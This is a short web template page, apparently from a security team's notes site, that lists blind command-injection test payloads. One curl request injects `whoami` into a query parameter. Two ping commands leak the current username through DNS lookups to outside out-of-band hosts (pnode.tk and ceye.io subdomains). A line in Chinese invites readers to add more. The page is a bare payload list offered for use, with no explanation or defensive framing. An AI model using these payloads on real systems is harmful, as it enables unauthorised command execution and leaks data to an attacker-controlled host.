{extend name="Admin/base" /}

{block name="body"}
<div  id='write'  class = 'is-mac'><ul><li>Author: p0desta</li><li>Team: TimeKeeper &amp; kn0ck</li><li>Blog: <a href='http://www.p0desta.com' target='_blank' class='url'>www.p0desta.com</a></li></ul><p>&nbsp;</p><h4><a name='header-n16' class='md-header-anchor '></a>payload</h4><ul><li><code>curl http://127.0.0.1:10082/public/?c=`whoami`</code></li><li><code>ping `whoami`.pnode.tk</code></li><li><code>ping %USERNAME%.b182oj.ceye.io</code></li></ul><p>&nbsp;</p><p>其他请自行补充。</p></div>
{/block}